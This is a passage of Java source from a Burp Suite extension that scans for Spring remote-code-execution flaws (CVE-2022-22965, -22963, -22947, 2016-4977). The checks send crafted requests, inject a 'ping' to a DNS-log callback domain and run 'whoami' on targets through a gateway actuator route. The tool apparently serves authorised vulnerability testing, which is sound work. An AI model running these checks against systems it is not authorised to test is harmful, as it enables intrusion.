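远程代码执行漏洞(CVE-2022-22965)===========================");
        this.yamlReader = new YamlReader(this.burpExtender);
    }

    /** Status codes the first (marker) request must produce for the echo check to continue. */
    private static final int[] ERROR_STATUS = {400, 500, 502, 503};
    /** Number of DNS-log polls, and the pause between them, before a callback check gives up. */
    private static final int POLL_ATTEMPTS = 3;
    private static final long POLL_INTERVAL_MS = 10000L;

    /** Whether {@code status} is one of ERROR_STATUS. */
    static boolean isErrorStatus(int status) {
        for (int s : ERROR_STATUS) {
            if (s == status) {
                return true;
            }
        }
        return false;
    }

    /**
     * Runs the echo check when "回显检测" is on and the callback check when "回连检测" is on, each first
     * with the request's own method and then with the method toggled. A callback result takes precedence
     * over an echo result.
     *
     * @return the issue found, or {@code null}
     */
    public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) {
        this.dnsLogPlatform = dnsLogPlatform;
        boolean isReverse = this.burpExtender.tags.getSettingUi().isReverseCheck();
        boolean isError = this.burpExtender.tags.getSettingUi().isErrorCheck();
        List<?> payloads = (List<?>) this.yamlReader.getValueByKey("CloudFramework.payloads");
        if (payloads == null || payloads.size() < 2) {
            // config.yml is user-editable; a missing or short list must not abort the scan with an exception.
            this.burpExtender.stderr.println("[-] config.yml 缺少 CloudFramework.payloads");
            return null;
        }
        String payload1 = payloads.get(0).toString();
        String payload2 = payloads.get(1).toString();

        IScanIssue echoIssue = null;
        if (isError) {
            echoIssue = this.errorCheck(iHttpRequestResponse, payload1, false, "");
            if (echoIssue == null) {
                echoIssue = this.errorCheck(iHttpRequestResponse, payload1, true, "");
            }
        }

        if (isReverse) {
            try {
                IScanIssue callbackIssue = this.reverseCheck(iHttpRequestResponse, payload2, false, "");
                if (callbackIssue == null) {
                    callbackIssue = this.reverseCheck(iHttpRequestResponse, payload2, true, "");
                }
                if (callbackIssue != null) {
                    return callbackIssue;
                }
            } catch (InterruptedException e) {
                // Keep the interrupt visible to the scanner thread instead of swallowing it.
                Thread.currentThread().interrupt();
            }
        }

        return echoIssue;
    }

    /** Replaces the request line with {@code GET /<flag>}, keeping whichever HTTP version the original used. */
    private static List<String> rewriteRequestLine(List<String> headers, String flag) {
        String version = headers.get(0).contains("HTTP/1.1") ? "HTTP/1.1" : "HTTP/2";
        headers.set(0, "GET /" + flag + " " + version);
        return headers;
    }

    /** Burp parameter type matching the method: URL parameter for GET, body parameter for anything else. */
    private static byte paramTypeFor(String method) {
        return "GET".equalsIgnoreCase(method) ? IParameter.PARAM_URL : IParameter.PARAM_BODY;
    }

    /**
     * Echo check. The configured {@code key=value} payload is sent once with a random marker in the
     * value and, if the server answers with an ERROR_STATUS, once more with the literal "false".
     * A flip from error to non-error is reported as Medium/Tentative: only differential behaviour
     * was observed, not execution.
     *
     * @param reqMethod when true the request method is toggled (GET/POST) for both probes
     * @param flag      path appended after "/" on the rewritten request line
     * @return the issue, or {@code null} when the responses do not show the flip
     */
    private IScanIssue errorCheck(IHttpRequestResponse iHttpRequestResponse, String payload, boolean reqMethod, String flag) {
        IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse);
        byte[] newHeaderRequest = this.helpers.buildHttpMessage(rewriteRequestLine(requestInfo.getHeaders(), flag), (byte[]) null);
        String method = requestInfo.getMethod();
        String[] keyValue = payload.split("=");
        if (keyValue.length < 2) {
            this.burpExtender.stderr.println("[-] CloudFramework payload 格式错误: " + payload);
            return null;
        }
        byte paramType = paramTypeFor(method);
        String markerValue = String.format(keyValue[1], this.checkIsSpring.randomStr(3));
        String falseValue = String.format(keyValue[1], "false");

        IParameter newParam = this.helpers.buildParameter(keyValue[0], markerValue, paramType);
        byte[] newParamReq = this.helpers.addParameter(newHeaderRequest, newParam);
        if (reqMethod) {
            newParamReq = this.helpers.toggleRequestMethod(newParamReq);
        }
        IHttpRequestResponse requestResponse1 = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamReq);
        if (requestResponse1.getResponse() == null) {
            return null;
        }
        IResponseInfo response1 = this.helpers.analyzeResponse(requestResponse1.getResponse());
        String requestLine = this.helpers.analyzeRequest(requestResponse1.getRequest()).getHeaders().get(0);
        this.burpExtender.stdout.println("[*] 正在检测:" + requestLine + "\n状态码:" + response1.getStatusCode());
        if (!isErrorStatus(response1.getStatusCode())) {
            return null;
        }

        // Second probe: same parameter, benign value, same method toggle, so only the value differs between the two.
        newParam = this.helpers.buildParameter(keyValue[0], falseValue, paramType);
        newParamReq = this.helpers.addParameter(newHeaderRequest, newParam);
        if (reqMethod) {
            newParamReq = this.helpers.toggleRequestMethod(newParamReq);
        }
        IHttpRequestResponse requestResponse2 = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamReq);
        if (requestResponse2.getResponse() == null) {
            return null;
        }
        IResponseInfo response2 = this.helpers.analyzeResponse(requestResponse2.getResponse());
        this.burpExtender.stdout.println("[*] 正在检测:" + response2.getHeaders().get(0) + "\n状态码:" + response2.getStatusCode());
        if (isErrorStatus(response2.getStatusCode())) {
            return null;
        }

        this.burpExtender.stdout.println("[*] 大概率存在漏洞......");
        this.updataHttp = requestResponse2;
        // "Tentative" is one of the three confidence values Burp accepts (Certain/Firm/Tentative).
        return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Framework RCE (CVE-2022-22965)", 0, "Medium", "Tentative", (String) null, (String) null, newParam.getName() + "=" + newParam.getValue(), (String) null, new IHttpRequestResponse[]{requestResponse2}, requestResponse2.getHttpService());
    }

    /**
     * Callback check. The configured {@code k1=v1&k2=v2} payload is sent with a fresh DNS-log domain
     * formatted into the first value, then the platform is polled. Reported as High/Certain only when
     * the platform recorded a lookup.
     *
     * @param reqMethod when true the request method is toggled (GET/POST) before sending
     * @param flag      path appended after "/" on the rewritten request line
     * @throws InterruptedException if the thread is interrupted while waiting for the callback
     */
    private IScanIssue reverseCheck(IHttpRequestResponse iHttpRequestResponse, String payload, boolean reqMethod, String flag) throws InterruptedException {
        IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse);
        String method = requestInfo.getMethod();
        byte[] newHeaderRequest = this.helpers.buildHttpMessage(rewriteRequestLine(requestInfo.getHeaders(), flag), (byte[]) null);

        String[] parts = payload.split("&");
        if (parts.length < 2 || !parts[0].contains("=") || !parts[1].contains("=")) {
            this.burpExtender.stderr.println("[-] CloudFramework payload 格式错误: " + payload);
            return null;
        }
        String dnsName = this.dnsLogPlatform.getTempDomain();
        String[] first = parts[0].split("=");
        String[] second = parts[1].split("=");
        String key1 = first[0];
        String value1 = String.format(first[1], "http://" + this.checkIsSpring.randomStr(3) + dnsName);
        String key2 = String.format(second[0], this.checkIsSpring.randomStr(3));
        String value2 = String.format(second[1], this.checkIsSpring.randomStr(3));
        this.burpExtender.stdout.println("[*] 正在检测payload:" + payload + "\n临时域名:" + dnsName);

        byte paramType = paramTypeFor(method);
        byte[] newParamsReq = this.helpers.addParameter(newHeaderRequest, this.helpers.buildParameter(key1, value1, paramType));
        newParamsReq = this.helpers.addParameter(newParamsReq, this.helpers.buildParameter(key2, value2, paramType));
        if (reqMethod) {
            newParamsReq = this.helpers.toggleRequestMethod(newParamsReq);
        }

        IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamsReq);
        if (requestResponse.getResponse() != null) {
            this.burpExtender.stdout.println("[*] 正在校验: " + this.helpers.analyzeRequest(requestResponse).getUrl() + " ...");
            if (this.waitForCallback()) {
                this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Framework 远程代码执行漏洞(CVE-2022-22965)===========================");
                this.updataHttp = requestResponse;
                return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Framework RCE (CVE-2022-22965)", 0, "High", "Certain", (String) null, (String) null, key1 + "=" + value1 + "&" + key2 + "=" + value2, (String) null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService());
            }
        }

        this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Framework 远程代码执行漏洞(CVE-2022-22965)===========================");
        return null;
    }

    /**
     * Polls the DNS-log platform up to POLL_ATTEMPTS times, POLL_INTERVAL_MS apart. Blocks the calling
     * scanner thread for up to about 30 s; an interrupt ends the wait and is propagated.
     */
    private boolean waitForCallback() throws InterruptedException {
        for (int i = 0; i < POLL_ATTEMPTS; i++) {
            if (this.dnsLogPlatform.checkResult()) {
                return true;
            }
            Thread.sleep(POLL_INTERVAL_MS);
        }
        return false;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudFuncionSpEl.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IParameter;
import burp.IRequestInfo;
import burp.IScanIssue;
import burp.SpringIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;
import burp.auxiliary.YamlReader;
import burp.payload.Payload;
import java.io.FileNotFoundException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Arrays;
import java.util.List;

/**
 * CVE-2022-22963 check: sends the configured header payloads and reports only when the DNS-log
 * platform records a callback.
 */
public class CloudFuncionSpEl implements Payload {
    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private CheckIsSpring checkIsSpring;
    private YamlReader yamlReader;
    private DnsLogInterface dnsLogPlatform;
    private IHttpRequestResponse updataHttp;

    public CloudFuncionSpEl(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)===========================");
        this.helpers = helpers;
        this.checkIsSpring = checkIsSpring;
        this.yamlReader = new YamlReader(this.burpExtender);
    }

    /**
     * Rewrites {@code httpRequestResponse} into a POST carrying the {@code key:value} header, a
     * form Content-Type and one random body parameter.
     *
     * @return the request bytes, or {@code null} when the request could not be rewritten
     */
    private byte[] action(IHttpRequestResponse httpRequestResponse, String key, String value) {
        try {
            IRequestInfo requestInfo = 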
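this.helpers.analyzeRequest(httpRequestResponse);
            byte[] rawRequest = httpRequestResponse.getRequest();
            List<String> headers = requestInfo.getHeaders();
            headers.add(key + ":" + value);
            headers.set(0, headers.get(0).replace("GET", "POST"));
            // Drop any existing Content-Type so the form-encoded one added below is the only one sent.
            headers.removeIf(header -> header != null && header.toLowerCase(java.util.Locale.ROOT).startsWith("content-type:"));
            headers.add("Content-type: application/x-www-form-urlencoded");
            // Carry the body over by byte offset; decoding to a String and back would corrupt multi-byte bytes.
            byte[] body = Arrays.copyOfRange(rawRequest, requestInfo.getBodyOffset(), rawRequest.length);
            IParameter param = this.helpers.buildParameter(this.checkIsSpring.randomStr(6), "1", IParameter.PARAM_BODY);
            return this.helpers.addParameter(this.helpers.buildHttpMessage(headers, body), param);
        } catch (RuntimeException e) {
            // Best effort: the caller skips a request that could not be rewritten.
            this.burpExtender.stderr.println(e.getMessage());
            return null;
        }
    }

    /**
     * Callback check, run only when "回连检测" is on. Both configured header payloads are sent against
     * the original URL and, if {@code <dir>/functionRouter} answers with anything but 404, against
     * that path too. The DNS log is polled only when one of the two probes answered 500. Reported as
     * High/Certain solely on a recorded callback.
     *
     * @return the issue, or {@code null}
     */
    public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) {
        this.dnsLogPlatform = dnsLogPlatform;
        if (this.burpExtender.tags.getSettingUi().isReverseCheck()) {
            IHttpService httpService = httpRequestResponse.getHttpService();
            List<?> payloads = (List<?>) this.yamlReader.getValueByKey("CloudFuncionSpEl.payloads");
            if (payloads == null || payloads.size() < 2) {
                // config.yml is user-editable; a missing or short list must not abort the scan with an exception.
                this.burpExtender.stderr.println("[-] config.yml 缺少 CloudFuncionSpEl.payloads");
                return null;
            }
            // A temporary domain is only requested from the platform when the callback check actually runs.
            String dnsLog = this.dnsLogPlatform.getTempDomain();
            String[] payload = ((String) payloads.get(0)).split(":");
            String[] payload2 = ((String) payloads.get(1)).split(":");
            String key = payload[0];
            String value1 = String.format(payload[1], dnsLog);
            String value2 = String.format(payload2[1], "ping " + dnsLog);
            this.burpExtender.stdout.println("[*] 正在测试payload: " + Arrays.toString(payload) + "\n" + Arrays.toString(payload2));

            try {
                IHttpRequestResponse first = this.send(httpService, this.action(httpRequestResponse, key, value1));
                IHttpRequestResponse second = this.send(httpService, this.action(httpRequestResponse, key, value2));
                if (first != null && second != null) {
                    boolean is500 = this.anyStatus500(first, second);
                    IRequestInfo requestInfo = this.helpers.analyzeRequest(second);

                    // Spring Cloud Function exposes /functionRouter; when that path exists the probes are repeated against it.
                    URL routerUrl = new URL(httpService.getProtocol(), httpService.getHost(), httpService.getPort(), this.checkIsSpring.getUri(requestInfo.getUrl().toString()) + "functionRouter");
                    IHttpRequestResponse router = this.burpExtender.callbacks.makeHttpRequest(httpService, this.helpers.buildHttpRequest(routerUrl));
                    if (router.getResponse() != null && this.helpers.analyzeResponse(router.getResponse()).getStatusCode() != 404) {
                        IHttpRequestResponse routerFirst = this.send(httpService, this.action(router, key, value1));
                        IHttpRequestResponse routerSecond = this.send(httpService, this.action(router, key, value2));
                        if (routerFirst != null && routerSecond != null) {
                            second = routerSecond;
                            requestInfo = this.helpers.analyzeRequest(second);
                            is500 = this.anyStatus500(routerFirst, routerSecond);
                        }
                    }

                    if (is500) {
                        this.burpExtender.stdout.println("[*] 回连检测是否存在 Spring Cloud Function SpEL RCE for: " + requestInfo.getUrl().toString() + " ...");
                        if (this.waitForCallback()) {
                            this.updataHttp = second;
                            this.burpExtender.stdout.println("[+] 存在回连!存在漏洞!!!!");
                            this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞 ===========================\n");
                            return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Function SpEL RCE", 0, "High", "Certain", (String) null, (String) null, "(Maybe) URI: '/functionRouter'\nHeaders: '" + key + ":" + value1 + "\n'or'\n" + key + ":" + value2 + "'\nTest dnsllog platform information:\n" + this.dnsLogPlatform.outExport(), (String) null, new IHttpRequestResponse[]{second}, second.getHttpService());
                        }
                    }
                }
            } catch (MalformedURLException e) {
                this.burpExtender.stderr.println(e.getMessage());
            } catch (InterruptedException e) {
                // Keep the interrupt visible to the scanner thread instead of swallowing it.
                Thread.currentThread().interrupt();
            }
        }

        this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞 ===========================\n");
        return null;
    }

    /** Sends {@code request} to {@code service}; {@code null} in means {@code null} out (action() failed). */
    private IHttpRequestResponse send(IHttpService service, byte[] request) {
        return request == null ? null : this.burpExtender.callbacks.makeHttpRequest(service, request);
    }

    /** Status code of the response, or -1 when there is none. */
    private int statusOf(IHttpRequestResponse r) {
        byte[] response = r.getResponse();
        return response == null ? -1 : this.helpers.analyzeResponse(response).getStatusCode();
    }

    /** Whether either probe answered 500. */
    private boolean anyStatus500(IHttpRequestResponse a, IHttpRequestResponse b) {
        return this.statusOf(a) == 500 || this.statusOf(b) == 500;
    }

    /**
     * Polls the DNS-log platform up to three times, 10 s apart. Blocks the calling scanner thread for up
     * to about 30 s; an interrupt ends the wait and is propagated.
     */
    private boolean waitForCallback() throws InterruptedException {
        for (int i = 0; i < 3; i++) {
            if (this.dnsLogPlatform.checkResult()) {
                return true;
            }
            Thread.sleep(10000L);
        }
        return false;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudGatewaySpEl.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import burp.IResponseInfo;
import burp.IScanIssue;
import burp.SpringIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;
import burp.auxiliary.YamlReader;
import burp.payload.Payload;
import java.io.FileNotFoundException;
import java.net.MalformedURLException;
import java.net.URL;
import 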
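java.util.ArrayList;
import java.util.List;

/**
 * In-band check for CVE-2022-22947 (Spring Cloud Gateway actuator SpEL injection).
 *
 * <p>Flow: (1) POST the route definition from {@code CloudGatewaySpEl.payloads[0]} (base64 in
 * config.yml, formatted with a random route id and the command {@code whoami}) to
 * {@code <base>actuator/gateway/routes/<id>}; (2) POST {@code <base>actuator/gateway/refresh} so
 * the gateway evaluates the filter expression; (3) GET the route back and look for the evaluated
 * result; (4) DELETE the route and refresh again. Step 4 runs whenever step 1 succeeded, so a
 * failed refresh or read-back no longer leaves the test route live on the gateway.
 *
 * <p>This executes a command ({@code whoami}) on the target: authorised testing only.
 */
public class CloudGatewaySpEl implements Payload {
    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private CheckIsSpring checkIsSpring;
    private YamlReader yamlReader;
    // Request/response pair behind the last finding; exposed through export().
    private IHttpRequestResponse updataHttp;

    public CloudGatewaySpEl(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)===========================");
        this.helpers = helpers;
        this.checkIsSpring = checkIsSpring;
        this.yamlReader = new YamlReader(this.burpExtender);
    }

    /**
     * Runs the CVE-2022-22947 check against {@code httpRequestResponse}.
     *
     * @return High/Certain issue when the evaluated result was read back from the route;
     *         Medium/Firm issue when the route was accepted (201) and refreshed (200) but the
     *         read-back did not match (the actuator write endpoint is reachable either way);
     *         {@code null} when registration or refresh failed
     */
    public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) {
        URL url = this.helpers.analyzeRequest(httpRequestResponse).getUrl();
        String uri = this.checkIsSpring.getUri(url.toString());
        String random_uri = this.checkIsSpring.randomStr(5);
        if (!this.CloudGatewayRegisterRoute(httpRequestResponse, uri, random_uri, "whoami")) {
            return this.notVulnerable();
        }
        this.burpExtender.stdout.print("[*] 添加新路由完成!");

        boolean refreshed = false;
        IHttpRequestResponse requestResponse = null;
        try {
            refreshed = this.CloudGatewayRefresh(httpRequestResponse, uri);
            if (refreshed) {
                this.burpExtender.stdout.print("+++新路由刷新完成!");
                requestResponse = this.CloudGatewayRoute(httpRequestResponse, uri, random_uri, false);
                if (requestResponse != null) {
                    this.burpExtender.stdout.print("+++新路由检测完成!");
                }
            }
        } finally {
            // The route was accepted by the gateway; remove it no matter how the rest went.
            this.cleanupRoute(httpRequestResponse, uri, random_uri);
        }

        if (requestResponse != null) {
            this.updataHttp = requestResponse;
            this.burpExtender.stdout.println("[+] 存在漏洞!!!!");
            this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)漏洞 ===========================\n");
            return new SpringIssue(url, "Spring Cloud GateWay SPEL RCE", 0, "High", "Certain", (String)null, (String)null, "vul! ! After detection, there is a vulnerability. The test route has been deleted. Please retest and exploit this vulnerability!", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService());
        }

        if (refreshed) {
            // Previously this path reported "vulnerable" and then dereferenced a null evidence
            // object; report it as an unconfirmed finding with the originating request instead.
            this.updataHttp = httpRequestResponse;
            this.burpExtender.stdout.println("[!] Route registered (201) and refreshed (200) but the evaluated result was not read back; reporting as unconfirmed.");
            return new SpringIssue(url, "Spring Cloud GateWay SPEL RCE", 0, "Medium", "Firm", (String)null, (String)null, "The gateway accepted a new route definition (201) and refreshed it (200), but the evaluated expression could not be read back from actuator/gateway/routes/. The actuator write endpoint appears exposed; verify manually. The test route has been deleted.", (String)null, new IHttpRequestResponse[]{httpRequestResponse}, httpRequestResponse.getHttpService());
        }

        return this.notVulnerable();
    }

    /** Logs the negative verdict and returns {@code null}. */
    private IScanIssue notVulnerable() {
        this.burpExtender.stdout.println("===========================检测完毕!不存在:Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)漏洞 ===========================\n");
        return null;
    }

    /**
     * Best-effort removal of the test route followed by a refresh so the removal takes effect.
     * Failures are logged, never thrown (this runs from a finally block).
     */
    private void cleanupRoute(IHttpRequestResponse httpRequestResponse, String uri, String random_uri) {
        try {
            // CloudGatewayRoute(..., true) returns the exchange only when the body echoes the
            // route id and "Result", which a DELETE normally does not, so its return is not a
            // success signal; the refresh status is the best indicator available.
            this.CloudGatewayRoute(httpRequestResponse, uri, random_uri, true);
            if (!this.CloudGatewayRefresh(httpRequestResponse, uri)) {
                this.burpExtender.stderr.println("[!] Refresh after deleting test route " + random_uri + " did not return 200; check " + uri + "actuator/gateway/routes/" + random_uri + " manually.");
            }
        } catch (RuntimeException e) {
            this.burpExtender.stderr.println("[!] Failed to clean up test route " + random_uri + ": " + e.getMessage());
        }
    }

    /**
     * Registers the test route by POSTing the formatted JSON payload to
     * {@code <uri>actuator/gateway/routes/<random_uri>}.
     *
     * <p>The path is built from {@code uri} so that registration, refresh and deletion all target
     * the same base path (previously registration used the absolute "/actuator/..." path while the
     * other two used {@code uri}, so a non-root base path left the route undeleted). Assumes
     * {@code uri} ends with "/" like the other helpers do — confirm against CheckIsSpring.getUri.
     *
     * @return true on HTTP 201
     */
    private boolean CloudGatewayRegisterRoute(IHttpRequestResponse httpRequestResponse, String uri, String random_uri, String cmd) {
        IHttpService service = httpRequestResponse.getHttpService();
        List payloads = (List)this.yamlReader.getValueByKey("CloudGatewaySpEl.payloads");
        String poc = (String)payloads.get(0);
        String payload = this.helpers.bytesToString(this.helpers.base64Decode(poc));
        payload = String.format(payload, random_uri, cmd);
        this.burpExtender.stdout.println("[*] 正在测试payload: " + payload);
        IRequestInfo requestInfo1 = this.helpers.analyzeRequest(httpRequestResponse);
        List<String> headers = requestInfo1.getHeaders();
        String version = headers.get(0).contains("HTTP/1.1") ? "HTTP/1.1" : "HTTP/2";
        headers.set(0, "POST " + uri + "actuator/gateway/routes/" + random_uri + " " + version);
        headers.removeIf((header) -> {
            return header != null && header.toLowerCase().startsWith("content-type:");
        });
        headers.add("Content-type: application/json");
        byte[] newRequest = this.helpers.buildHttpMessage(headers, this.helpers.stringToBytes(payload));
        IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest);
        if (requestResponse.getResponse() == null) {
            this.burpExtender.stderr.println("[!] No response while registering test route " + random_uri);
            return false;
        }
        IResponseInfo responseInfo1 = this.helpers.analyzeResponse(requestResponse.getResponse());
        this.burpExtender.stdout.println("响应状态码:" + responseInfo1.getStatusCode());
        return responseInfo1.getStatusCode() == 201;
    }

    /** Minimal fixed header set used by the refresh and route helpers. */
    private List<String> baseHeaders(String requestLine, IHttpService service) {
        List<String> headers = new ArrayList<>();
        headers.add(requestLine);
        headers.add("Host: " + service.getHost() + ":" + service.getPort());
        headers.add("User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0");
        headers.add("Accept-Encoding: gzip, deflate");
        headers.add("Accept: */*");
        headers.add("Content-Type: application/x-www-form-urlencoded");
        headers.add("Connection: close");
        return headers;
    }

    /**
     * POSTs {@code <uri>actuator/gateway/refresh} with an empty body.
     *
     * @return true on HTTP 200 (false also when no response came back)
     */
    private boolean CloudGatewayRefresh(IHttpRequestResponse httpRequestResponse, String uri) {
        IHttpService service = httpRequestResponse.getHttpService();
        List<String> headers = this.baseHeaders("POST " + uri + "actuator/gateway/refresh HTTP/1.1", service);
        byte[] newRequest = this.helpers.buildHttpMessage(headers, new byte[0]);
        IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest);
        byte[] rawResponse = requestResponse.getResponse();
        if (rawResponse == null) {
            return false;
        }
        return this.helpers.analyzeResponse(rawResponse).getStatusCode() == 200;
    }

    /**
     * GETs (or, with {@code deleteRoute}, DELETEs) {@code <uri>actuator/gateway/routes/<random_uri>}.
     *
     * @return the exchange when the response is 200 and its body contains both the route id and
     *         "Result" (presumably the key under which the gateway echoes the evaluated filter
     *         value); {@code null} otherwise, including when no response came back
     */
    private IHttpRequestResponse CloudGatewayRoute(IHttpRequestResponse httpRequestResponse, String uri, String random_uri, boolean deleteRoute) {
        IHttpService service = httpRequestResponse.getHttpService();
        String method = deleteRoute ? "DELETE " : "GET ";
        List<String> headers = this.baseHeaders(method + uri + "actuator/gateway/routes/" + random_uri + " HTTP/1.1", service);
        byte[] newRequest = this.helpers.buildHttpMessage(headers, new byte[0]);
        IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest);
        byte[] rawResponse = requestResponse.getResponse();
        if (rawResponse == null) {
            return null;
        }
        IResponseInfo responseInfo1 = this.helpers.analyzeResponse(rawResponse);
        String strResponse = this.helpers.bytesToString(rawResponse);
        if (responseInfo1.getStatusCode() == 200 && strResponse.contains(random_uri) && strResponse.contains("Result")) {
            return requestResponse;
        }
        return null;
    }

    /** Request/response pair of the last finding, or {@code null} when nothing was found. */
    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/DataCommons.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import 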
burp.BurpExtender;
import burp.IHttpRequestResponse;
import burp.IScanIssue;
import burp.DnsLog.DnsLogInterface;
import burp.payload.Payload;

/**
 * Placeholder check, presumably for Spring Data Commons (CVE-2018-1273; ScanPayload.check18_1273
 * is likewise empty). Not implemented: doCheckVul() performs no request and always returns
 * {@code null}, so selecting this entry in the UI never produces a finding.
 */
public class DataCommons implements Payload {
    private BurpExtender burpExtender;
    private IHttpRequestResponse updataHttp; // never assigned; export() always returns null

    public DataCommons(BurpExtender burpExtender) {
        this.burpExtender = burpExtender;
    }

    /** Stub: no request is sent and nothing is reported. */
    public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) {
        return null;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/MessagingRCE.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IHttpRequestResponse;
import burp.IScanIssue;
import burp.DnsLog.DnsLogInterface;
import burp.payload.Payload;

/**
 * Placeholder check, presumably for Spring Messaging (CVE-2018-1270; ScanPayload.check18_1270 is
 * likewise empty). Not implemented: doCheckVul() performs no request and always returns
 * {@code null}, so selecting this entry in the UI never produces a finding.
 */
public class MessagingRCE implements Payload {
    private BurpExtender burpExtender;
    private IHttpRequestResponse updataHttp; // never assigned; export() always returns null

    public MessagingRCE(BurpExtender burpExtender) {
        this.burpExtender = burpExtender;
    }

    /** Stub: no request is sent and nothing is reported. */
    public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) {
        return null;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/SecurityOAuth2RCE.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import 
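burp.IResponseInfo;
import burp.IScanIssue;
import burp.SpringIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;
import burp.auxiliary.YamlReader;
import burp.payload.Payload;
import java.io.FileNotFoundException;
import java.net.URL;
import java.util.Arrays;
import java.util.List;

/**
 * Check for CVE-2016-4977 (Spring Security OAuth2 SpEL injection in the authorisation endpoint).
 *
 * <p>For every username/password pair listed in {@code SecurityOAuth2RCE.payloads} the request
 * path from the third entry is requested with HTTP Basic credentials. A response body containing
 * {@code "response types: [4]"} is reported as High/Certain (presumably the configured path carries
 * an expression evaluating to 4 that the error page echoes back — confirm against config.yml).
 * A 401 only shows that the endpoint exists and the pair was wrong, so every pair is tried first
 * and only then is a Medium finding reported. Credentials are taken from the trusted config.yml
 * and are not logged.
 */
public class SecurityOAuth2RCE implements Payload {
    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private CheckIsSpring checkIsSpring;
    private YamlReader yamlReader;
    // Request/response pair behind the last finding; exposed through export().
    private IHttpRequestResponse updataHttp;

    public SecurityOAuth2RCE(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)===========================");
        this.helpers = helpers;
        this.checkIsSpring = checkIsSpring;
        this.yamlReader = new YamlReader(this.burpExtender);
    }

    /**
     * Runs the CVE-2016-4977 check against {@code httpRequestResponse}.
     *
     * @return High/Certain issue on an evaluated-expression echo; Medium/Certain issue when no
     *         pair succeeded but at least one request was answered with 401; {@code null} otherwise
     */
    public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) {
        URL url = this.helpers.analyzeRequest(httpRequestResponse).getUrl();
        List payloads = (List)this.yamlReader.getValueByKey("SecurityOAuth2RCE.payloads");
        // Assumed yml layout: "username:a,b,c", "password:x,y,z", then the request path;
        // substring(9) strips the 9-character "username:" / "password:" prefix — verify in config.yml.
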